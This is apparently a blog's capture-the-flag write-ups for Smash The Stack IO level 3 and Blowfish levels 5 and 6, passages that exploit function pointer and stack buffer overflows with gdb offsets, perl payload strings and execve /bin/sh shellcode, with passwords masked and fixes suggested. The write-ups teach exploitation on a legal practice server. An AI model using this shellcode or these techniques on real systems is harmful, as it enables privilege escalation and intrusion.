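/* Simplified object: its first field points at a table of function pointers. */
struct object {
    method_fn *vtable;
};

static int intended_method(void) { return 1; }
static int attacker_method(void) { return 2; }

/* A virtual call dereferences twice: object -> table -> function. */
int call_first_virtual(const struct object *obj) {
    method_fn *table = obj->vtable;  /* first load: the table pointer */
    method_fn target = table[0];     /* second load: the function address */
    return target();
}

/* Reports the result of the call before and after the table pointer is replaced. */
void demo_vtable_swap(int *before, int *after) {
    method_fn real_table[1] = { intended_method };
    method_fn fake_table[1] = { attacker_method };  /* plays the role of the first 4 bytes of our buffer */
    struct object obj = { real_table };

    *before = call_first_virtual(&obj);
    obj.vtable = fake_table;         /* models the overflow overwriting the pointer */
    *after = call_first_virtual(&obj);
}
```

In the exploit above, the first four bytes of the annotation buffer (at 0x0804a00c) play the role of fake_table, and the value stored there (0x0804a010) is the address the program finally jumps to.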

There we have it.  While programs can use memory from either the stack or the heap, buffer overflows still allow attackers to overwrite memory, which may compromise the security and integrity of the programs.


IO Level 3 – Function Pointers

Welcome back.  Today we’re going to be looking at the IO wargame from Smash The Stack.  Specifically, we will be looking at level 3.  If you’re interested in following along, go ahead and ssh into IO as level3 with the password you got from completing level2.

Once in, we should check the /levels directory as that is where the executables for this wargame reside.  Upon doing this we can see two files, an executable called level03 and a file called level03.c.  Let’s look at the C file and see if we can find something to exploit:

level3@io:~$ more /levels/level03.c
#include <stdio.h>
#include <unistd.h>
#include <string.h>

int good(int addr) {
printf(“Address of hmm: %p\n”, addr);
}

int hmm() {
printf(“Win.\n”);
execl(“/bin/sh”, “sh”, NULL);
}

extern char **environ;

int main(int argc, char **argv) {

int i, limit;

for(i = 0; environ[i] != NULL; i++)
memset(environ[i], 0x00, strlen(environ[i]));

int (*fptr)(int) = good;
char buf[32];

if(strlen(argv[1]) <= 40) limit = strlen(argv[1]);

for(i = 0; i <= limit; i++) {
buf[i] = argv[1][i];
if(i < 36) buf[i] = 0x41;
}

int (*hmmptr)(int) = hmm;

(*fptr)((int)hmmptr);

return 0;

}

Looking at the code, we can see there is a character buffer that gets filled with input from the first command line argument.  This seems like a good place to start looking.  Further analyzing the code shows that if we want to fill this buffer, we’re going to be limited in the number of bytes we can write by the variable “limit”, which controls the buffer writing for-loop.  Looking one line up, we can see the only place where the limit variable is set.  Here, it is set to the length of the first command line argument only if the length of the first command line argument is less than or equal to 40 characters.

So far, this seems promising.  We can see there is a 32 byte buffer and we can get the program to write 40 bytes of our input to it.  This means that the program is vulnerable to a buffer overflow.  However, only being able to overflow it by 8 bytes is a restriction in that it won’t be enough to overwrite the return address on the stack.  Now would be a good time to try and figure out what the stack looks like, so we know what we can overwrite with this buffer overflow, and how it might affect the program.

Looking at the order in which variables are defined in the source code, we can assume the stack has a layout similar to the following:

    4B     32B    4B     4B    4B  4B   4B   4B    4B
[*hmmptr][buf][*fptr][limit][i][sfp][ra][argc][argv]

Judging by the above layout and the program, we have an interesting conundrum.  The variable *fptr is a function pointer.  Also, if we look at the bottom of the code before the final return 0, we can see that this function pointer is used to call the function it points to.  This simply means, if we can get *fptr to point to a function which does something useful, we could benefit.  Also since *fptr is after buf, it looks like it may be in range of the overflow.  However, if we look at the code again, we see the final line of the for-loop doesn’t let us control what is written to memory during the first 36 bytes of writing.  Looking at the above memory layout, that means we might not be able to control *fptr.

However, let’s get a more detailed view of memory in this program instead of our guess.  Let’s load the program in gdb and disassemble main.  While I won’t post all the assembly code here, I will post a few lines of importance.  Essentially what we want to do is read through the assembly and understand where each variable is on the stack.  To do that, we can look for the instructions that use our variables of interest and see at what offset from the base pointer the variables reside.  Below are the lines we’re looking for with some added comments:

0x08048524 <main+117>: movl $0x8048464,-0x14(%ebp) –int (*fptr)(int) = good;
0x0804855d <main+174>: cmp -0x10(%ebp),%eax –i <= limit;

–buf[i] = 0x41;
0x08048582 <main+211>: lea -0x38(%ebp),%eax –move address of start of buf into eax
0x08048585 <main+214>: add -0xc(%ebp),%eax –add value of i to eax
0x08048588 <main+217>: movb $0x41,(%eax) –move hex value 0x41 into memory address stored in eax

0x08048592 <main+227>: movl $0x804847f,-0x3c(%ebp) –int (*hmmptr)(int) = hmm;

Looking at the above lines of assembly we can figure out where on the call stack the variables for the program reside, specifically what is located 36 bytes after the start of buf.  This is an important question because it seems as though we’re only able to control what is written to the four bytes starting at buf+36.  Analyzing the above we can pull out the following offsets for variables:

-0x3c(%ebp) => hmmptr
-0x38(%ebp) => buf
-0x14(%ebp) => fptr
-0x10(%ebp) => limit
-0x0c(%ebp) => i

Finally, doing a little math we can calculate the difference between the memory location of buf and of fptr:

0x38 – 0x14 = 0x24

Which, when we convert it to decimal, is 36.  Interestingly enough, that means that fptr starts 36 bytes past the start of buf.  So, if we use a 40 character string we can exploit the buffer overflow to change the value of fptr.  Now we need to determine what to change fptr to.  Luckily enough, the function “hmm” looks like a good target!  It does exactly what we want: it spawns a shell.  Using the assembly lines above, we can see that the hmm function starts at memory location 0x0804847f.  So, let’s attempt to write a 40 character string which will overwrite fptr with the location of hmm.  Remember to write the bytes in little-endian (reverse) order:

level3@io:~$ /levels/level03 `perl -e ‘print “A”x36,”\x7f\x84\x04\x08″‘`
Win.
sh-4.1$ whoami
level4
sh-4.1$ more /home/level4/.pass
YYYYYYYYYYYY
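To double check the reasoning, the copy loop can be replayed safely on a plain byte array.  The sketch below is only a model: the flat frame array, the FPTR_OFFSET constant, and the function simulate_level03 are made up for illustration, and limit is initialized to 0 here even though the original leaves it uninitialized.  It runs the same loop as level03.c and then reads back the four bytes where fptr would live.

```c
#include <stdint.h>
#include <string.h>

#define FPTR_OFFSET 36  /* 0x38 - 0x14, taken from the disassembly */

/*
 * Replays the copy loop from level03.c on a flat byte array that stands in
 * for the stack frame, then returns the 32-bit little-endian value found
 * where fptr would live. The array and this function are illustrative only.
 */
uint32_t simulate_level03(const char *arg) {
    unsigned char frame[48] = {0};  /* buf at offset 0, fptr at offset 36 */
    size_t limit = 0;               /* assumption: uninitialized in the original */
    size_t i;

    if (strlen(arg) <= 40) limit = strlen(arg);

    for (i = 0; i <= limit; i++) {
        frame[i] = (unsigned char)arg[i];
        if (i < 36) frame[i] = 0x41;  /* the first 36 bytes are forced to 'A' */
    }

    /* Reassemble the four bytes at offset 36, lowest byte first. */
    return (uint32_t)frame[FPTR_OFFSET]
         | (uint32_t)frame[FPTR_OFFSET + 1] << 8
         | (uint32_t)frame[FPTR_OFFSET + 2] << 16
         | (uint32_t)frame[FPTR_OFFSET + 3] << 24;
}
```

Feeding it 36 filler characters followed by \x7f\x84\x04\x08 returns 0x0804847f, the address of hmm, no matter what the filler characters are, since the loop overwrites them with 0x41 anyway.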

There we have it.  In this example we found a vulnerable buffer overflow which allowed us to re-write a function pointer and simply wait for the function to be called.  This is slightly different from many of the other common buffer overflows which simply smash through the entire stack frame to overwrite the return address at the end.  It just goes to show that buffer overflows are security vulnerabilities which need to be taken seriously.


Blowfish Level 6 – Typo Smash!

Welcome back.  Today we’re going to be looking at Level 6 of the Blowfish wargame from Smash The Stack.  As a reminder, the final password for the next level will be removed from this page and replaced with Y’s.  Let’s jump in.

Let’s use the level 6 password we got from the end of level 5 and ssh into Blowfish.  Upon arrival, let’s get a listing of the files for this level:

level6@blowfish:~$ ls /levels | grep level6
level6
level6.c

As usual, a SUID executable binary and its source code.  Since we’ve been seeing quite a few buffer overflows recently, let’s go ahead and start off by reading the source code:

level6@blowfish:~$ more /levels/level6.c
#include <stdio.h>
#include <string.h>

int badfunc(char *string1, char *string2) {

char buffer1[1024];
char buffer2[1024];

if(strlen(string1)>=sizeof(buffer1)) {
printf(“\n\t(!) overflow detected.\n”);
printf(“\t(-) exiting…\n\n”);
return -1;
}
else {
printf(“\n\t(+) copying string1 into the buffer…”);
snprintf(buffer1,sizeof(buffer1),”%s”,string1);
printf(“\t\t[done] (%d)\n”, strlen(buffer1));
}

if(strlen(string2)>=sizeof(buffer2)*3) {
printf(“\n\t(!) overflow detected.\n”);
printf(“\t(-) exiting…\n\n”);
return -1;
}
else {
printf(“\t(+) copying string2 into the buffer…”);
snprintf(buffer2,sizeof(buffer1)*3,”%s”,string2);
printf(“\t\t[done] (%d)\n\n”, strlen(buffer2));
}

return 0;
}

int main(int argc, char *argv[]) {

if(argc != 3)
return -1;

badfunc(argv[2], argv[1]);

return 0;
}

Looking at the main function we can see the program takes exactly two command line arguments, passes them to the function badfunc in switched order, aka badfunc(argv[2], argv[1]), then exits.  So let’s look at the badfunc function.  This function consists of two 1024 byte buffers, and what appears to be input checking code.  The first if statement checks whether the length of the first parameter is greater than or equal to the size of the first buffer and if so, returns.  If not, it copies the first parameter into the first buffer using snprintf.  The snprintf function is used safely here in that the maximum number of bytes to write is the size of the destination buffer, and thus it won’t overflow the buffer.  However, if we look at the second if statement, we can see it’s slightly different.  It checks whether the length of the second parameter is greater than or equal to three times the size of the second buffer and if so, returns.  If not, it copies the second parameter into the second buffer using snprintf.  In this case, snprintf is given three times the size of the first buffer as the maximum number of bytes to write.  It may not be clear why three times the buffer size is used in the second if/else statement, but it means up to 3071 characters plus a terminating null can be written into a 1024 byte buffer, which leaves the program vulnerable to buffer overflow attacks.
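For comparison, here is a minimal sketch of what a consistent check could look like.  The helper name copy_if_fits and its return convention are made up for illustration and are not part of level6.c; the point is only that the length check and the snprintf bound both use the size of the buffer actually being written to.

```c
#include <stdio.h>
#include <string.h>

/*
 * Hypothetical helper: copies src into dst only if it fits, using the
 * destination's own size for both the check and the snprintf bound.
 * Returns 0 on success and -1 if src is too long.
 */
int copy_if_fits(char *dst, size_t dst_size, const char *src) {
    if (dst_size == 0 || strlen(src) >= dst_size) {
        return -1;
    }
    snprintf(dst, dst_size, "%s", src);
    return 0;
}
```

Called as copy_if_fits(buffer2, sizeof(buffer2), string2), a helper like this would reject any input of 1024 characters or more instead of letting it run past the end of the buffer.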

To get an idea for the size of our attack strings, let’s try to remember how memory is laid out on the call stack for a frame.  The stack grows down, and space for local variables is generally set aside in the order in which they are declared, although the compiler is free to reorder and pad them.  On 32 bit x86 the function’s arguments sit above the return address, so we should have something along the lines of:

   1024B    1024B    4B  4B     4B       4B

[buffer2][buffer1][sfp][ra][string1][string2]

So, we’re going to need parameter two of the badfunc function to be the overflow string.  Looking back at main, that’s argv[1], which is the first command line argument.  To overflow, it’s going to need to fill buffer2, buffer1, and sfp, and be correctly positioned for writing on ra.  That’s at least 1024 + 1024 + 4 = 2052 bytes of padding.  This binary turns out to need another 8 bytes (compiler padding or saved registers) before the return address is reached, so we need 2060 bytes to pad until the return address, and then we want to write 4 bytes on the return address.  Let’s open up gdb and see if we can get our attack string figured out using perl.

level6@blowfish:~$ gdb /levels/level6

(gdb) run `perl -e ‘print “A”x2060,”BBBB”‘` `perl -e ‘print “C”x1023’`
Starting program: /levels/level6 `perl -e ‘print “A”x2060,”BBBB”‘` `perl -e ‘print “C”x1023’`

(+) copying string1 into the buffer… [done] (1023)
(+) copying string2 into the buffer… [done] (2064)
Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()
(gdb) quit

Oho! Perfectly calculated.  Look at that address, 0x42424242.  We overwrote the return address exactly with four B’s.  Now the last thing we need to do is load up some shellcode and put its memory location in our overflow string instead of the B’s.  So let’s export some shellcode, with a small NOP padding at the beginning, into the environmental variable SHELLCODE:

level6@blowfish:~$ export SHELLCODE=$’\x90\x90\x90\x90\x90\x90\x90\x90\x90
\x90\x90\x31\xdb\x89\xd8\xb0\x17\xcd\x80\x31\xdb
\x89\xd8\xb0\x2e\xcd\x80\x31\xc0\x50\x68\x2f\x2f
\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89
\xe1\x31\xd2\xb0\x0b\xcd\x80′

Now let’s use our getenv C program to get the memory location of our SHELLCODE environmental variable:

#include <stdio.h>
#include <stdlib.h>

int main(int argc, char *argv[])
{
if(!argv[1])
exit(1);
printf("%p\n", (void *)getenv(argv[1]));
return 0;
}

level6@blowfish:/tmp/.t$ ./getenv SHELLCODE
0xbfffda03

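Alright!  Now we have our shellcode in memory with our NOP padding starting at location 0xbfffda03.  Now we just need to write an address inside that NOP padding over the return address with our buffer overflow string and we should get a shell.  We’ll use 0xbfffda08, a few bytes into the padding, to leave some slack in case the variable sits at a slightly different address when level6 runs.  Let’s try: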

level6@blowfish:~$ /levels/level6 `perl -e ‘print “A”x2060,”\x08\xda\xff\xbf”‘` `perl -e ‘print “C”x1023’`

(+) copying string1 into the buffer… [done] (1023)
(+) copying string2 into the buffer… [done] (2064)

sh-3.2$ whoami
level7
sh-3.2$ more /pass/level7
YYYYYYYY
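The perl one-liner used above is doing two things: repeating a filler byte and appending the target address lowest byte first.  As a rough sketch, the same string could be assembled in C like this.  The function build_overflow and its parameters are made up for illustration, and the caller is assumed to supply a buffer with room for pad_len + 5 bytes.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/*
 * Hypothetical helper: writes pad_len filler bytes followed by addr in
 * little-endian order, then a terminating NUL. out must have room for
 * pad_len + 5 bytes. Returns the length of the string written.
 */
size_t build_overflow(unsigned char *out, size_t pad_len, uint32_t addr) {
    memset(out, 'A', pad_len);
    out[pad_len + 0] = (unsigned char)(addr & 0xff);          /* lowest byte first */
    out[pad_len + 1] = (unsigned char)((addr >> 8) & 0xff);
    out[pad_len + 2] = (unsigned char)((addr >> 16) & 0xff);
    out[pad_len + 3] = (unsigned char)((addr >> 24) & 0xff);  /* highest byte last */
    out[pad_len + 4] = '\0';
    return pad_len + 4;
}
```

With pad_len = 2060 and addr = 0xbfffda08 this produces the same 2064 byte string as the perl command.  Note that an address containing a 0x00 byte would cut the string short when passed as a command line argument.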

There we have it, a buffer overflow even with the use of a “safe” function.  Unfortunately, it’s only as safe as it’s programmed to be.  If the function had been used correctly, and the buffer size wasn’t multiplied, things wouldn’t have turned out like this.


Blowfish Level 5 – More Stack Smashing

Today we’re going to be looking at the Blowfish wargame from Smash The Stack, working on level 5.  As always, the password will be stripped from this page and replaced with Y’s.  To begin, let’s use the password we got at the end of level 4 to ssh into Blowfish as level5.  Upon logging in, we are told that this level is another buffer overflow located at /levels/level5, so let’s get a directory listing and see what we’re working with today:

level5@blowfish:~$ ls -la /levels | grep level5
-r-sr-x--- 1 level5 level4 11775 2006-10-09 18:02 level4
-r-sr-x--- 1 level6 level5 12142 2006-10-09 18:02 level5
-r-------- 1 level5 level5 272 2006-10-09 18:02 level5.c

Ok, looks like we have the correct SUID executable at /levels/level5.  We also have what looks to be the program’s source code.  So, let’s look at that source code:

level5@blowfish:~$ more /levels/level5.c
#include <stdio.h>

int main()
{
char buffer[1024];

if (getenv(“VULN”) == NULL) {
fprintf(stderr,”Try Again!!\n”);
exit(1); }

strcpy(buffer, (char *)getenv(“VULN”));

printf(“Environment variable VULN is:\n\”%s\”.\n\n”, buffer);
return 0;
}

Looking at the code we see there is a 1024 byte buffer created.  Next, the program checks that the environmental variable “VULN” exists; if not, the program gives an error and exits.  Next, strcpy is used to copy the contents of the environmental variable “VULN” into the 1024 byte buffer.  Finally the contents of the buffer are written to the screen with printf.

Looking at the code we can see that there is unsafe use of the strcpy function.  Since strcpy takes only a destination and a source, with no maximum number of characters to copy, if the environmental variable “VULN” is 1024 bytes or longer the buffer will overflow, which could result in arbitrary code execution.  This sounds like a good avenue of attack, so let’s look into it further.

All we should have to do is write the correct string to the environmental variable “VULN”, so let’s make an attempt.  We know we need VULN to be at least 1024 bytes long, and that there will be a few extra bytes based on the compiler.  So let’s take a guess at about 1024 + 20 = 1044 bytes of padding.  This can be done easily with perl as follows:

level5@blowfish:~$ export VULN=`perl -e ‘print “A”x1044,”BBBB”‘`

Now let’s run the program and see what happens.  If the string we assigned to VULN was long enough, we should expect to get a Segmentation fault:

level5@blowfish:~$ /levels/level5
Environment variable VULN is:
“AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB”.

Segmentation fault

Great, just what we wanted.  Now let’s load up gdb and see if we can determine the exact number of bytes we need to write before we overwrite the return address of the call stack:

level5@blowfish:~$ gdb /levels/level5

(gdb) run
Starting program: /levels/level5
Environment variable VULN is:
“AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB”.
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) quit

Alright.  Those familiar with gdb should know that the final 0x41414141 towards the bottom represents the location in memory which the program tried to execute before blowing up.  This is the “address” which was in the return address slot on the call stack when main returned.  The reason for the value of 0x41414141 is that the return address was overwritten with the 4 byte ASCII string “AAAA”, as 41 is the hex value of ASCII “A”.  So let’s reduce the number of A’s we’re writing to try and position the four B’s directly over the return address.  To do this we need to go back to the shell and re-assign the value of VULN, then we can try gdb again:

level5@blowfish:~$ export VULN=`perl -e ‘print “A”x1036,”BBBB”‘`
level5@blowfish:~$ gdb /levels/level5

(gdb) run
Starting program: /levels/level5
Environment variable VULN is:
“AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB”.
Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()
(gdb) quit

Aha!  What a lucky guess on the second try.  So we must write 1036 bytes into the buffer before we start overwriting the return address.  The next thing we need to do is get our shell code, put it in memory, and get the starting memory address.  However, let’s try something different from the last level.  Let’s place our shell code in the environmental variable VULN itself; it’s certainly long enough.  First, let’s make our C program to get the memory location of an environmental variable:

#include <stdio.h>
#include <stdlib.h>

int main(int argc, char *argv[])
{
if(!argv[1])
exit(1);
printf("%p\n", (void *)getenv(argv[1]));
return 0;
}

Now let’s go ahead and check where VULN is located:

level5@blowfish:~$ /tmp/.getmem VULN
0xbfffdab4

Now, let’s look at our shell code.  Most importantly, we need to know how many bytes it is:

\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
\x31\xdb\x89\xd8\xb0\x17\xcd\x80\x31\xdb\x89
\xd8\xb0\x2e\xcd\x80\x31\xc0\x50\x68\x2f\x2f
\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53
\x89\xe1\x31\xd2\xb0\x0b\xcd\x80

Counting it up, it looks like it’s going to be 52 bytes.  So 1036 – 52 = 984.  So we’ll need 984 A’s after the shell code.  Also, instead of having B’s at the end, we need to write the memory location of our shell code.  So let’s look at defining VULN again:

level5@blowfish:~$ export VULN=$’\x90\x90\x90\x90\x90\x90\x90\x90\x90
\x90\x90\x31\xdb\x89\xd8\xb0\x17\xcd\x80\x31\xdb
\x89\xd8\xb0\x2e\xcd\x80\x31\xc0\x50\x68\x2f\x2f
\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89
\xe1\x31\xd2\xb0\x0b\xcd\x80’`perl -e ‘print “A”x984,”\xba\xda\xff\xbf”‘`
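The arithmetic behind this string is simple enough to sanity check in code.  The two helpers below, filler_needed and lands_in_sled, are made-up names for illustration only.  The first computes how many filler bytes go between the code at the front of the buffer and the return address; the second checks that the address we write actually falls inside the NOP padding, using the address reported by our helper program as the start of the variable.

```c
#include <stddef.h>
#include <stdint.h>

/*
 * Hypothetical helper: given the distance from the start of the buffer to
 * the return address and the size of the code placed at the front, returns
 * how many filler bytes are needed in between, or -1 if the code does not fit.
 */
long filler_needed(size_t ret_offset, size_t code_len) {
    if (code_len > ret_offset) {
        return -1;
    }
    return (long)(ret_offset - code_len);
}

/*
 * Hypothetical helper: returns 1 if target points into a NOP sled of
 * sled_len bytes that starts at sled_start, and 0 otherwise.
 */
int lands_in_sled(uint32_t sled_start, size_t sled_len, uint32_t target) {
    return target >= sled_start && (size_t)(target - sled_start) < sled_len;
}
```

With the numbers from this level, filler_needed(1036, 52) gives 984, and lands_in_sled(0xbfffdab4, 11, 0xbfffdaba) is true because the target is 6 bytes into the 11 byte NOP padding.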

Now that we have our shell code in memory and our overflow string determined, we can go ahead and try to execute the vulnerable program:

level5@blowfish:~$ /levels/level5
Environment variable VULN is:
“1ÛØ°Í1ÛØ°.Í1ÀPh//shh/binãPSá1Ò°
ÍAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAºÚÿ¿”.

sh-3.2$ whoami
level6
sh-3.2$ more /pass/level6
YYYYYYYYYY

To avoid this attack, the copy needs to be bounded.  The strncpy function is a variant of strcpy which takes as a third parameter the maximum number of characters to copy.  Using that and providing the length of the buffer minus one, then setting the final byte of the buffer to the null character (strncpy does not add one when the source is too long), would prevent these types of buffer overflow attacks.
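As a minimal sketch of that advice, a bounded copy might look like the following.  The helper name bounded_copy is made up for illustration; it is one possible way to wrap strncpy, not the only fix.

```c
#include <string.h>

/*
 * Hypothetical helper: copies at most dst_size - 1 bytes of src into dst
 * and always terminates the result. Longer input is silently truncated.
 */
void bounded_copy(char *dst, size_t dst_size, const char *src) {
    if (dst_size == 0) {
        return;
    }
    strncpy(dst, src, dst_size - 1);
    dst[dst_size - 1] = '\0';  /* strncpy does not add this when src is too long */
}
```

In the level 5 program, replacing the strcpy call with bounded_copy(buffer, sizeof(buffer), getenv("VULN")) would truncate an oversized VULN at 1023 characters instead of writing past the end of the buffer.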
